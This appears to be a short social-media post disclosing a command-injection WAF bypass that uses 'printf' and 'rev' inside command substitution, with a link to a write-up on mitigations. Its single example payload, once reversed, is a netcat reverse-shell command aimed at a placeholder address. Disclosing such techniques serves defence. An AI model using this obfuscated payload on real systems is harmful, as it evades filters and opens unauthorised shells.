A command injection WAF bypass method discovered by Picus Labs researcher
@evrnyalcin
It uses “rev” and “printf” commands in command substitution.
Example: $(printf ‘hsab/nib/ e- 4321 1.0.0.721 cn’|rev)
Read the write-up for details and mitigations:
https://t.co/UeUwrmaGle